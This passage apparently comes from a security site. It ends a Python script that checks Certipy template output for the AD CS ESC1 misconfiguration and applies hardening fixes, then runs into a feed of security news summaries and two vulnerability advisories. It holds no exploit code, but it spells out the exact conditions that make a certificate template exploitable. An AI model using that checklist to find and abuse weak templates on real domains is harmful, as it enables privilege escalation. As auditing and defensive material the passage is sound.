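BROAD_PRINCIPALS = {"authenticated users", "domain users", "domain computers", "everyone"}
# Assumption: EKUs that let an issued certificate be used for domain logon.
AUTH_EKUS = {"client authentication", "pkinit client authentication",
             "smart card logon", "any purpose"}


def parse_template(text):
    """Turn Certipy's 'Key : value' lines into {key: [values]}.
    Lines without ' : ' continue the previous key's value list."""
    fields, last = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " : " in line:
            key, _, val = line.partition(" : ")
            last = key.strip()
            fields[last] = [val.strip()] if val.strip() else []
        elif last is not None:
            fields[last].append(line)
    return fields


def _flag(fields, key):
    return fields.get(key, ["False"])[0].lower() == "true"


def audit_esc1(fields):
    """Evaluate the ESC1 conditions one by one. The template is exploitable the
    way the write-up describes only when every value is True."""
    ekus = {e.lower() for e in fields.get("Extended Key Usage", [])}
    enrollers = {p.split("\\")[-1].lower() for p in fields.get("Enrollment Rights", [])}
    return {
        "template enabled": _flag(fields, "Enabled"),
        "enrollee supplies subject": _flag(fields, "Enrollee Supplies Subject"),
        "authentication EKU present": bool(ekus & AUTH_EKUS) or _flag(fields, "Any Purpose"),
        "no manager approval": not _flag(fields, "Requires Manager Approval"),
        "no authorized signature required": fields.get("Authorized Signatures Required", ["0"])[0] == "0",
        "broad enrollment rights": bool(enrollers & BROAD_PRINCIPALS),
    }


def is_esc1(fields):
    return all(audit_esc1(fields).values())


def failing_conditions(fields):
    """The ESC1 conditions that do NOT hold, i.e. the settings already blocking the attack."""
    return [name for name, holds in audit_esc1(fields).items() if not holds]


def with_setting(text, key, value):
    """Return the record with one 'Key : value' line rewritten (continuation lines untouched)."""
    out = []
    for line in text.splitlines():
        k, sep, _ = line.partition(" : ")
        out.append(f"{k}{sep}{value}" if sep and k.strip() == key else line)
    return "\n".join(out)


def hardened_copy(text):
    """The two template-level fixes: let the CA build the subject from AD instead of
    the request, and require a certificate manager to approve issuance. Dropping
    Domain Computers from the enrollment rights would be the third lever."""
    text = with_setting(text, "Enrollee Supplies Subject", "False")
    return with_setting(text, "Requires Manager Approval", "True")


if __name__ == "__main__":
    for label, record in (("as found", RETRO_CLIENTS), ("hardened", hardened_copy(RETRO_CLIENTS))):
        f = parse_template(record)
        print(f"{f['Template Name'][0]} ({label}): ESC1={is_esc1(f)} blocked by {failing_conditions(f)}")
```

On the record as found every condition holds, so the template is reported as ESC1; on the hardened copy two conditions no longer hold and the verdict flips. Evaluating the conditions separately rather than returning one boolean is deliberate: it tells an AD CS administrator which single setting to change, and it makes "enrollee supplies subject with no approval" stand out even on templates whose enrollment rights are narrow today but might be widened later.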
by InfoSec Write-ups
2025-02-19 05:05:16
I Hacked FIDE.com — Call me Hacknus Carlsen!As a chess player, I have faced all kinds of pain — blundering my queen, losing to a 900-rated player, and watching my online chess rating…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:00:51
Free VPS for penetration testing and bug bounty part 2🚨👉 Free Link: click here 👈🚨Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:00:36
Cyber hygiene habits that many still ignoreCybersecurity advice is everywhere. We’re constantly reminded to update our passwords, enable two-factor authentication, and avoid clicking suspicious links. Yet, beneath these practical steps lie deeper cyber hygiene habits that, despite their importance, are frequently overlooked. These underlying mindsets and systemic behaviors shape the security landscape. 1. Treating digital security as a habit, not a checklist Most cybersecurity recommendations are framed as tasks: update software, change passwords, verify emails. But proper cyber hygiene isn’t about … More → The post Cyber hygiene habits that many still ignore appeared first on Help Net Security.
by Help Net Security
2025-02-19 02:00:00
North Korea's Kimsuky Taps Trusted Platforms to Attack South KoreaThe campaign heavily uses Dropbox folders and PowerShell scripts to evade detection and quickly scrapped infrastructure components after researchers began poking around.
by Dark Reading
2025-02-18 22:42:24
$10 Infostealers Are Breaching Critical US Security: Military and Even the FBI HitA new report reveals how cheap Infostealer malware is exposing US military and defense data, putting national security at risk. Hackers exploit human error to gain access.
by Hackread
2025-02-18 22:30:07
Juniper Networks fixed a critical flaw in Session Smart RoutersJuniper Networks has addressed a critical vulnerability, tracked as CVE-2025-21589, impacting the Session Smart Router. Juniper Networks addressed a critical authentication bypass vulnerability, tracked as CVE-2025-21589 (CVSS score of 9.8), affecting its Session Smart Router product. “An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based […]
by Security Affairs
2025-02-18 22:28:33
Xerox Printer Vulnerabilities Enable Credential CaptureAttackers are using patched bugs to potentially gain unfettered access to an organization's Windows environment under certain conditions.
by Dark Reading
2025-02-18 22:17:55
China-Linked Threat Group Targets Japanese Orgs' ServersWinnti once used a variety of malware but is now focused on SQL vulnerabilities and obfuscation, updated encryption, and new evasion methods to gain access.
by Dark Reading
2025-02-18 22:15:59
Managed healthcare defense contractor to pay $11 million over alleged cyber failingsThe settlement with Health Net Federal Services is the latest penalty levied on a federal contractor as part of a 2021 initiative to root out cyber-related fraud.
by The Record
2025-02-18 21:50:14
Elon Musk’s DOGE Is Being Sued Under the Privacy Act: What to KnowAt least eight ongoing lawsuits related to the so-called Department of Government Efficiency’s alleged access to sensitive data hinge on the Watergate-inspired Privacy Act of 1974. But it’s not airtight.
by WIRED Security News
2025-02-18 21:04:00
New OpenSSH Flaws Enable Man-in-the-Middle and DoS Attacks — Patch NowTwo security vulnerabilities have been discovered in the OpenSSH secure networking utility suite that, if successfully exploited, could result in an active machine-in-the-middle (MitM) and a denial-of-service (DoS) attack, respectively, under certain conditions. The vulnerabilities, detailed by the Qualys Threat Research Unit (TRU), are listed below - CVE-2025-26465 (CVSS score: 6.8) - The
by The Hacker News
2025-02-18 20:57:01
Hard drives containing sensitive medical data found in flea marketA flea market buyer found medical information about hundreds of patients on second hand decommissioned hard drives.
by Malwarebytes Labs
2025-02-18 20:40:06
Hackers use ‘sophisticated’ macOS malware to steal cryptocurrency, Microsoft saysIn a report released on Monday, threat intelligence specialists at Microsoft said that they have discovered the new XCSSET strain in limited attacks. XCSSET, first spotted in the wild in August 2020, spreads by infecting Xcode projects, which developers use to create apps for Apple devices.
by The Record
2025-02-18 20:39:00
Chinese Hackers Exploit MAVInject.exe to Evade Detection in Targeted Cyber AttacksThe Chinese state-sponsored threat actor known as Mustang Panda has been observed employing a novel technique to evade detection and maintain control over infected systems. This involves the use of a legitimate Microsoft Windows utility called Microsoft Application Virtualization Injector (MAVInject.exe) to inject the threat actor's malicious payload into an external process, waitfor.exe,
by The Hacker News
2025-02-18 20:19:27
How can AI assist OSINT researchersOpen-source intelligence (OSINT) is gaining more attention due to the massive volume of digital data generated daily by computing devices, Internet of Things (IoT) sensors, and people's interactions on social media platforms.
by Barracuda
2025-02-18 19:52:23
Web Application Security Requirements and Best PracticesWeb applications are a key part of the modern digital experience, but that makes them high-value targets for cybercriminals. Protecting against vulnerabilities requires a proactive approach.
by Legit Security
2025-02-18 19:35:14
The Rise of Email Marketing Platforms for Business Email Compromise AttacksIn a statistical report published in September 2024 by the Federal Bureau of Investigation (FBI), it was revealed that more than US$55 billion was lost to business email compromise (BEC) attacks between October 2013 and December 2023. This profitability drives attackers to further their techniques and adapt to security filters.
by SpiderLabs Blog
2025-02-18 19:23:29
Unifying IT & OT With AI-Led Investigations for Industrial SecurityDiscover how AI-led investigations unify IT and OT security, reducing alert fatigue and accelerating alert investigation in industrial environments.
by Darktrace
2025-02-18 19:22:00
How to turn on Private DNS Mode on Android - and why it matters for privacyTurning on Private DNS Mode on Android ensures your searches and DNS queries are encrypted, keeping them safe from prying eyes. Here's what else you should know.
by ZDNET Security
2025-02-18 19:02:31
Microsoft: New Variant of macOS Threat XCSSET Spotted in the WildMicrosoft is warning the modular and potentially wormable Apple-focused infostealer boasts new capabilities for obfuscation, persistence, and infection, and could lead to a supply chain attack.
by Dark Reading
2025-02-18 18:37:26
How Phished Data Turns into Apple & Google WalletsCarding -- the underground business of stealing, selling and swiping stolen payment card data -- has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.
by Krebs on Security
2025-02-18 18:30:00
New FrigidStealer Malware Targets macOS Users via Fake Browser UpdatesCybersecurity researchers are alerting to a new campaign that leverages web injects to deliver a new Apple macOS malware known as FrigidStealer. The activity has been attributed to a previously undocumented threat actor known as TA2727, with the information stealers for other platforms such as Windows (Lumma Stealer or DeerStealer) and Android (Marcher). TA2727 is a "threat actor that uses fake
by The Hacker News
2025-02-18 18:28:19
VC giant Insight Partners confirms January cyberattackThe VC firm has $90 billion in assets under management and invested in several unicorn cybersecurity startups © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-02-18 18:15:28
Pangea Launches AI Guard and Prompt Guard to Combat Gen-AI Security RisksGuardrail specialist releases new products to aid the development and use of secure gen-AI apps. The post Pangea Launches AI Guard and Prompt Guard to Combat Gen-AI Security Risks appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 18:08:58
Researchers detail unauthenticated bypass via Apple USB vulnerabilitySecurity consultancy Quarkslab said that the flaw could allow threat actors to bypass USB lockouts.
by SC Media
2025-02-18 18:05:07
Critical OpenSSH Vulnerabilities Expose Users to MITM and DoS AttacksTwo critical OpenSSH vulnerabilities discovered! Qualys TRU finds client and server flaws (CVE-2025-26465 & CVE-2025-26466) enabling MITM and…
by Hackread
2025-02-18 17:57:39
WinRAR 7.10 boosts Windows privacy by stripping MoTW dataWinRAR 7.10 was released yesterday with numerous features, such as larger memory pages, a dark mode, and the ability to fine-tune how Windows Mark-of-the-Web flags are propagated when extracting files. [...]
by BleepingComputer
2025-02-18 17:53:00
Why rebooting your phone daily is your best defense against zero-click attacksPhone hacking technologies are becoming more and more inconspicuous. That's why you should treat your phone like a computer, according to this cybersecurity expert.
by ZDNET Security
2025-02-18 17:52:52
Ecuador's legislature says hackers attempted to access confidential informationThe National Assembly, Ecuador's unicameral legislature, says it was able to "identify and counteract" attempts by malicious hackers to breach sensitive systems.
by The Record
2025-02-18 17:50:00
Debunking the AI Hype: Inside Real Hacker TacticsIs AI really reshaping the cyber threat landscape, or is the constant drumbeat of hype drowning out actual, more tangible, real-world dangers? According to Picus Labs' Red Report 2025 which analyzed over one million malware samples, there's been no significant surge, so far, in AI-driven attacks. Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a
by The Hacker News
2025-02-18 17:48:00
Juniper Session Smart Routers Vulnerability Could Let Attackers Bypass AuthenticationJuniper Networks has released security updates to address a critical security flaw impacting Session Smart Router, Session Smart Conductor, and WAN Assurance Router products that could be exploited to hijack control of susceptible devices. Tracked as CVE-2025-21589, the vulnerability carries a CVSS v3.1 score of 9.8 and a CVS v4 score of 9.3. "An Authentication Bypass Using an Alternate Path or
by The Hacker News
2025-02-18 17:39:30
These nations are banning DeepSeek AI - here's whySouth Korea just banned DeepSeek from the Google Play and the App Store. Several other countries have also taken action against the Chinese startup's chatbot.
by ZDNET Security
2025-02-18 17:22:54
Hackers planted a Steam game with malware to steal gamers’ passwordsResearchers found that PirateFI was never designed to be a real game, but a vehicle to infect gamers with malware and steal their passwords with an infostealer called Vidar. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-02-18 17:16:23
OpenSSH flaws could enable man-in-the-middle attacks, denial of serviceIf the VerifyHostKeyDNS option is activated, an attacker could impersonate a server to hijack SSH sessions.
by SC Media
2025-02-18 17:15:41
New Snake Keylogger Variant Launches 280 Million AttacksA new variant of Snake Keylogger, a credential-stealing malware, has been detected in over 280 million infection attempts, highlighting its widespread impact. The malware’s latest resurgence, which was observed by Fortinet, primarily impacts users in China, Turkey, Indonesia, Taiwan, and Spain. It uses phishing emails to infiltrate systems and steal credentials from browsers like Chrome, … The post New Snake Keylogger Variant Launches 280 Million Attacks appeared first on CyberInsider.
by Cyber Insider
2025-02-18 17:00:00
AI Threat Intelligence, AI Hacking, Data Breaches, Zhong, DOGE, and more - SWN #452
by SC Media
2025-02-18 16:54:07
MirrorTab Raises $8.5M Seed Round to Take on Browser-Based AttacksSan Francisco startup secures $8.5 million in seed funding led by Valley Capital Partners to tackle browser-based malware attacks. The post MirrorTab Raises $8.5M Seed Round to Take on Browser-Based Attacks appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 16:32:32
Cyberattack likely to have ‘material impact’ on media giant Lee Enterprises’ bottom lineMedia conglomerate Lee Enterprises told regulators on Friday that hackers had stolen files and encrypted “critical applications” as part of an incident that impacted the operations of dozens of newspapers nationwide.
by The Record
2025-02-18 16:30:25
6 considerations for 2025 cybersecurity investment decisionsCybersecurity professionals may be concerned about the constantly shifting threat landscape. From the increased use of artificial intelligence (AI) by malicious actors to the expanding attack surface, cybersecurity risks evolve, and defenders need to mitigate them. Despite a period of cybersecurity budget growth between 2021 and 2022, this growth has slowed in the last few years, meaning that cybersecurity leaders need to carefully consider how their purchases improve their current security and compliance posture. To … More → The post 6 considerations for 2025 cybersecurity investment decisions appeared first on Help Net Security.
by Help Net Security
2025-02-18 16:25:24
Cracked Garry's Mod, BeamNG.drive games infect gamers with minersA large-scale malware campaign dubbed "StaryDobry" has been targeting gamers worldwide with trojanized versions of cracked games such as Garry's Mod, BeamNG.drive, and Dyson Sphere Program. [...]
by BleepingComputer
2025-02-18 16:21:01
Does AI Get a Free Pass on IP? Understanding 'Fair Use' for AIAs AI redefines the scale of "fair use" by rapidly ingesting and repurposing vast amounts of public data, concerns over privacy, intellectual property, and ethical boundaries grow.
by ITPro Today
2025-02-18 16:20:32
Snake Keylogger Variant Hits Windows, Steals Data via Telegram BotsThe New Snake Keylogger variant targets Windows users via phishing emails, using AutoIt for stealth. Learn how it…
by Hackread
2025-02-18 16:19:40
BlackLock ransomware onslaught: What to expect and how to fight itBlackLock is on track to become the most active ransomware-as-a-service (RaaS) outfit in 2025, according to ReliaQuest. Its success is primarily due to their unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and their aggressive recruiting of traffers (individuals that steer victims to harmful content/software), initial access brokers (IABs), and affiliates. What is BlackLock? BlackLock (aka El Dorado or Eldorado) cropped up in early 2024. It uses custom-built ransomware that can … More → The post BlackLock ransomware onslaught: What to expect and how to fight it appeared first on Help Net Security.
by Help Net Security
2025-02-18 16:10:38
China-linked APT group Winnti targets Japanese organizations since March 2024China-linked threat actor Winnti targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 as part of a campaign dubbed RevivalStone. Researchers from cybersecurity firm LAC uncovered a new cyberespionage campaign, tracked as RevivalStone, carried out by the China-linked APT group Winnti in March 2024. Threat actors targeted Japanese companies in the manufacturing, […]
by Security Affairs
2025-02-18 16:00:28
Cybercriminals shift focus to social media as attacks reach historic highsA new report from Gen highlights a sharp rise in online threats, capping off a record-breaking 2024. Between October and December alone, 2.55 billion cyber threats were blocked – an astonishing rate of 321 per second. The risk of encountering a threat climbed to 27.7% in Q4, with social engineering attacks accounting for 86% of all blocked threats. This underscores the increasingly sophisticated psychological tactics cybercriminals are using to deceive victims. “We’re continuing to see … More → The post Cybercriminals shift focus to social media as attacks reach historic highs appeared first on Help Net Security.
by Help Net Security
2025-02-18 15:33:43
Venture capital giant Insight Partners hit by cyberattackNew York-based venture capital and private equity firm Insight Partners has disclosed that its systems were breached in January following a social engineering attack. [...]
by BleepingComputer
2025-02-18 15:22:00
Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage CampaignThe China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41
by The Hacker News
2025-02-18 15:00:45
Unit21 empowers financial institutions to detect and stop scamsUnit21 launched its new scams solution that helps financial institutions and fintechs detect and stop scams before they cause financial harm. Using AI automation, the new solution can be integrated into a fraud team’s workflow to accelerate investigations and response times while also incorporating IP insights and consortium signals to prevent and detect scams before they hit consumer financial accounts. Advancements in technology have allowed criminals to scam consumers and businesses at unprecedented speed and … More → The post Unit21 empowers financial institutions to detect and stop scams appeared first on Help Net Security.
by Help Net Security
2025-02-18 14:45:57
New XCSSET Malware Variant Targeting macOS Notes App and WalletsMicrosoft warns Apple developers about a new XCSSET malware variant targeting macOS, posing security risks through stealthy infections…
by Hackread
2025-02-18 14:41:58
Keeper Security Launches Upgraded KeeperPAMKeeper Security has today announced the next generation of its Privileged Access Management (PAM) platform, KeeperPAM®. The latest update introduces a fully cloud-native solution that seamlessly integrates all privileged access management processes into Keeper’s encrypted vault. This unified approach ensures maximum security, simplicity and scalability, enabling organisations to manage privileged credentials and secrets securely within […] The post Keeper Security Launches Upgraded KeeperPAM appeared first on IT Security Guru.
by IT Security Guru
2025-02-18 14:24:54
Infostealers target major US defense contractors, military personnelAttackers stole data from U.S. military and Lockheed Martin, Boeing and Honeywell employees for as little as $10 per computer.
by SC Media
2025-02-18 14:20:55
Microsoft reminds admins to prepare for WSUS driver sync deprecationMicrosoft once again reminded IT administrators that driver synchronization in Windows Server Update Services (WSUS) will be deprecated on April 18, just 60 days from now. [...]
by BleepingComputer
2025-02-18 14:20:39
Boomi API Management helps enterprises tackle API sprawlBoomi unveiled its API Management (APIM) solution, delivering cloud-scale APIM alongside integration and automation, data management, and AI capabilities as part of the Boomi Enterprise Platform. Comprised of Boomi’s existing API Management offering along with assets recently acquired from both Cloud Software Group and APIIDA, Boomi API Management enables enterprises to conquer API chaos, power agentic AI, and unleash their business potential – transforming APIs into strategic drivers of growth. According to IDC, organizations with … More → The post Boomi API Management helps enterprises tackle API sprawl appeared first on Help Net Security.
by Help Net Security
2025-02-18 14:18:08
From South America to Southeast Asia: The Fragile Web of REF7707Elastic Security Labs has uncovered a sophisticated cyber-espionage campaign, designated as REF7707, targeting the foreign ministry of a South American nation and linked to other compromises in Southeast Asia. The post From South America to Southeast Asia: The Fragile Web of REF7707 appeared first on ZENDATA Cybersecurity.
by Zendata
2025-02-18 14:09:54
CERT-In Issues Critical Warning on Adobe Software Security Flaws

Overview
The Indian Computer Emergency Response Team (CERT-In) has issued a critical security advisory (CIVN-2025-0025) detailing multiple vulnerabilities across various Adobe products. These security flaws pose significant risks, including unauthorized code execution, privilege escalation, security bypass, and denial-of-service (DoS) attacks. Users and administrators of affected Adobe software are urged to apply security updates immediately to mitigate these risks.

Affected Software
The vulnerabilities impact multiple Adobe products across different versions. The affected software includes:
- Adobe InDesign: InDesign ID20.0 and earlier versions; InDesign ID19.5.1 and earlier versions
- Adobe Commerce: Adobe Commerce 2.4.4-p11 and earlier versions; Adobe Commerce B2B 1.3.3-p11 and earlier versions; Magento Open Source 2.4.4-p11 and earlier versions
- Adobe Substance 3D Stager: Substance 3D Stager 3.1.0 and earlier versions
- Adobe InCopy: InCopy 20.0 and earlier versions; InCopy 19.5.1 and earlier versions
- Adobe Illustrator: Illustrator 2025 29.1 and earlier versions; Illustrator 2024 28.7.3 and earlier versions
- Adobe Substance 3D Designer: Substance 3D Designer 14.0.2 and earlier versions
- Adobe Photoshop Elements: Photoshop Elements 2025.0 (Builds: 20240918.PSE.cae27345, 20240918.PSE.d3263bae)

Risk and Impact Assessment
Risk Assessment: These vulnerabilities are classified as Critical, making them high-risk threats that can lead to unauthorized access to sensitive data, system instability, and potential compromise of critical operations.
Impact Assessment:
- Arbitrary Code Execution: Attackers can exploit the vulnerabilities to run malicious code on affected systems, potentially gaining full control over compromised machines.
- Privilege Escalation: Unauthorized users may gain elevated privileges, allowing them to modify system settings and access restricted resources.
- Security Feature Bypass: Malicious actors can circumvent security controls, enabling further exploitation of the affected systems.
- Denial of Service (DoS): Successful exploitation can result in system crashes or unavailability, disrupting operations and productivity.

Technical Details
The vulnerabilities stem from multiple security flaws, including:
- Out-of-Bounds Write: Writing data outside the allocated buffer, leading to potential code execution.
- Integer Underflow (Wraparound): Arithmetic errors causing improper memory operations.
- Heap-Based Buffer Overflow: Exploitation can lead to memory corruption and code execution.
- Out-of-Bounds Read: Reading data beyond allocated memory, potentially exposing sensitive information.
- NULL Pointer Dereference: Application crashes or unpredictable behavior.
- Improper Input Validation: Malicious input bypassing security checks.
- Path Traversal: Unauthorized file system access.
- Incorrect Authorization & Improper Access Control: Attackers gaining higher privileges.
- Stored Cross-Site Scripting (XSS): Injection of malicious scripts into applications.
- Use After Free: Exploiting released memory pointers for arbitrary code execution.
- Time-of-Check to Time-of-Use (TOCTOU) Race Condition: Exploiting system state changes during execution.
- Stack-Based Buffer Overflow: Execution of attacker-controlled code.
- Temporary File Creation with Incorrect Permissions: Unauthorized access to sensitive files.

Mitigation and Recommended Actions
CERT-In strongly recommends applying security patches as soon as possible to prevent exploitation. Users and administrators should:
- Update Software: Apply the latest security updates available on the Adobe Security Bulletin.
- Monitor System Activity: Regularly check for unusual activities or unauthorized access.
- Restrict Privileges: Minimize user privileges to reduce potential impact.
- Enable Security Features: Use built-in security controls such as access controls and firewalls.
- Regular Backups: Maintain updated backups to ensure data recovery in case of an attack.
- Security Awareness: Educate users on recognizing phishing attempts and suspicious activities.

Conclusion
The vulnerabilities reported in Adobe products highlight the growing need for proactive security measures in software environments. System administrators and security teams must act swiftly to apply patches and implement best practices to safeguard their infrastructure. Organizations relying on Adobe products should remain vigilant, ensuring that security updates are promptly installed to prevent potential exploitation. Staying updated and following security advisories is crucial in mitigating threats and maintaining a secure digital ecosystem.

References
https://www.cert-in.org.in

The post CERT-In Issues Critical Warning on Adobe Software Security Flaws appeared first on Cyble.
by CYBLE
2025-02-18 14:00:23
Intruder Enhances Free Vulnerability Intelligence Platform ‘Intel’ with AI-Generated CVE DescriptionsLondon, United Kingdom, 18th February 2025, CyberNewsWire
by Hackread
2025-02-18 14:00:00
CyberheistNews Vol 15 #07 Facebook Business Users Beware: Thousands Hit by New Phishing Scam
by KnowBe4
2025-02-18 13:36:28
Finastra Starts Notifying People Impacted by Recent Data BreachFinancial software firm Finastra is notifying individuals whose personal information was stolen in a recent data breach. The post Finastra Starts Notifying People Impacted by Recent Data Breach appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 13:25:46
KnowBe4’s Explosive Inside Man Series Back For Season 6What do data centres hidden under Romanian castles, data mining, deepfakes, fight-scenes, on-screen kisses and AI supercomputers have in common? Security awareness training. Yes, seriously – and that’s just season six of KnowBe4’s The Inside Man. There’s plenty more (five other seasons in fact) where that came from. Yes, Mark Shepherd and co are back […] The post KnowBe4’s Explosive Inside Man Series Back For Season 6 appeared first on IT Security Guru.
by IT Security Guru
2025-02-18 13:20:00
Critical Vulnerability Patched in Juniper Session Smart RouterA critical vulnerability tracked as CVE-2025-21589 has been patched in Juniper Networks’ Session Smart Router. The post Critical Vulnerability Patched in Juniper Session Smart Router appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 13:16:54
Lee Enterprises Confirms Ransomware Behind System OutageLee Enterprises has officially confirmed that the cyberattack disrupting its newspaper operations since early February was a ransomware incident. In an 8-K filing submitted to the U.S. Securities and Exchange Commission (SEC), the publishing company acknowledged that attackers encrypted critical applications and exfiltrated certain files, though it remains unclear whether sensitive data was compromised. The … The post Lee Enterprises Confirms Ransomware Behind System Outage appeared first on CyberInsider.
by Cyber Insider
2025-02-18 13:14:37
Scanning for Trouble: Behind the Scenes of Our QR Code Phishing DemoAt KnowBe4, we constantly strive to stay ahead of emerging threats and create training content to warn users about the latest tactics used by cybercriminals.
by KnowBe4
2025-02-18 13:13:54
Protect Your Data: Russian Spear-Phishing Targets Microsoft 365 AccountsSeveral Russian threat actors, including the SVR’s Cozy Bear, are launching highly targeted spear phishing attacks against Microsoft 365 accounts, according to researchers at Volexity.
by KnowBe4
2025-02-18 13:09:49
CVE-2022-31631: High-Risk PHP Vulnerability Demands Immediate Patch

Overview
A critical security vulnerability has been identified in PHP, one of the most widely used server-side scripting languages for web development. The vulnerability, tracked as CVE-2022-31631, affects multiple versions of PHP and poses a significant risk to websites and applications relying on the PHP Data Objects (PDO) extension for SQLite database interactions. The flaw, which stems from an integer overflow issue in the PDO::quote() function, has the potential to allow SQL injection attacks, leading to unauthorized access, data breaches, and system compromise.

Key Details
- CVE ID: CVE-2022-31631
- CVSS Base Score: 9.1 (Critical)
- Affected Component: PDO::quote() function when used with SQLite databases
- Impact: SQL injection vulnerability due to improper string sanitization
- Published Date: February 12, 2025
- Last Modified: February 13, 2025
- Source: PHP Group
- Severity Level: Critical

Affected PHP Versions
The vulnerability affects the following versions of PHP:
- PHP 8.0.x before 8.0.27
- PHP 8.1.x before 8.1.15
- PHP 8.2.x before 8.2.2

Fixed Versions
The issue has been addressed in the following PHP versions:
- PHP 8.0.27
- PHP 8.1.15
- PHP 8.2.2 (or later)

Technical Description
The vulnerability resides in the PDO::quote() function, which is designed to safely escape user-supplied input before including it in SQL queries. However, in the affected versions, providing an overly long string as input can cause an integer overflow, leading to improper string sanitization. This flaw allows attackers to inject malicious SQL code, potentially compromising the security of the entire database.

Potential Exploitation
If successfully exploited, this vulnerability can allow attackers to:
- Inject malicious SQL code into the database
- Gain unauthorized control over the database
- Steal sensitive data, including credentials and personal information
- Modify or delete database content
- Potentially compromise the entire system, depending on the application's privileges

Impact and Severity
While the primary risk of CVE-2022-31631 is SQL injection, secondary impacts include Denial of Service (DoS) scenarios where the system becomes unresponsive due to excessive queries. The risk level is high, given that SQL injection is one of the most dangerous web application vulnerabilities, often leading to full system compromise.

CVSS Score Breakdown
The vulnerability has been assigned a CVSS v3.1 base score of 9.1 (Critical), with the following vector details:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): High (H)
- Privileges Required (PR): None (N)
- User Interaction (UI): None (N)
- Scope (S): Unchanged (U)
- Confidentiality Impact (C): None (N)
- Integrity Impact (I): None (N)
- Availability Impact (A): High (H)
While the high attack complexity may limit mass exploitation, sophisticated attackers can leverage this vulnerability to conduct targeted attacks on vulnerable PHP applications.

Mitigation Strategies and Recommended Actions
To mitigate the risk associated with CVE-2022-31631, affected users should take the following steps:
- Update PHP Immediately: Upgrade to PHP versions 8.0.27, 8.1.15, or 8.2.2 (or later) to eliminate the vulnerability.
- Apply Security Patches: If upgrading is not immediately possible, apply security patches provided by the PHP development team.
- Validate Input Data: Ensure all user inputs are properly validated and sanitized before passing them to the database.
- Use Parameterized Queries: Instead of relying on PDO::quote(), utilize prepared statements and parameterized queries to prevent SQL injection.
- Monitor Database Activity: Implement monitoring and logging to detect suspicious database queries and mitigate potential attacks in real time.
- Perform Security Audits: Regularly conduct security assessments and penetration testing to identify and address vulnerabilities in your web application.

Workarounds
Currently, no workarounds are available for this vulnerability. The only reliable mitigation is upgrading to a patched version of PHP. NetApp has acknowledged public discussions regarding CVE-2022-31631 and its implications. While no active exploits have been reported in the wild, the public disclosure of this vulnerability increases the likelihood of exploitation. Organizations using affected PHP versions should treat this as a priority issue and remediate it immediately.

Conclusion
CVE-2022-31631 is a critical security vulnerability in PHP that exposes applications to potential SQL injection attacks due to an integer overflow issue in the PDO::quote() function for SQLite databases. Given the high severity score and the risk of data breaches, system compromise, and denial-of-service (DoS) attacks, affected users are strongly urged to update their PHP installations immediately. Organizations should also adopt best practices such as input validation, parameterized queries, and continuous security monitoring to mitigate the risks associated with SQL injection vulnerabilities.

References:
https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/98
https://security.netapp.com/advisory/ntap-20230223-0007/

The post CVE-2022-31631: High-Risk PHP Vulnerability Demands Immediate Patch appeared first on Cyble.
by CYBLE
2025-02-18 13:02:32
Understanding the Brute Force Attack Playback and Defense StrategyThis post first appeared on blog.netwrix.com and was written by Dirk Schrader.Introduction to Brute Force Attacks A brute force attack is a trial-and-error technique used by cybercriminals to gain access to sensitive information such as passwords, encryption keys, or login credentials. Essentially, it involves systematically attempting every possible password combination until the correct one is found. It’s akin to a thief trying to open a combination … Continued
by Netwrix
2025-02-18 13:00:32
Chinese hackers abuse Microsoft APP-v tool to evade antivirusThe Chinese APT hacking group "Mustang Panda" has been spotted abusing the Microsoft Application Virtualization Injector utility as a LOLBIN to inject malicious payloads into legitimate processes to evade detection by antivirus software. [...]
by BleepingComputer
2025-02-18 13:00:00
Singulr Launches With $10M in Funding for AI Security and Governance PlatformSingulr AI announced its launch with $10 million in seed funding raised for an enterprise AI security and governance platform. The post Singulr Launches With $10M in Funding for AI Security and Governance Platform appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 12:50:48
Golang Backdoor Abuses Telegram for C&C CommunicationA newly discovered Golang backdoor is abusing Telegram for communication with its command-and-control (C&C) server. The post Golang Backdoor Abuses Telegram for C&C Communication appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 12:41:02
Santa Clara County Balances Progress and SustainabilityThe heart of the Silicon Valley faces opportunities and challenges as it maps out the future of energy.
by ITPro Today
2025-02-18 12:40:00
As US newspaper outages drag on, Lee Enterprises blames cyberattack for encrypting critical systemsLee said it was analyzing whether sensitive or personal data was stolen in the cyberattack.
by TechCrunch
2025-02-18 12:34:00
New Xerox Printer Flaws Could Let Attackers Capture Windows Active Directory CredentialsSecurity vulnerabilities have been disclosed in Xerox VersaLink C7025 Multifunction printers (MFPs) that could allow attackers to capture authentication credentials via pass-back attacks via Lightweight Directory Access Protocol (LDAP) and SMB/FTP services. "This pass-back style attack leverages a vulnerability that allows a malicious actor to alter the MFP's configuration and cause the MFP
by The Hacker News
2025-02-18 12:27:16
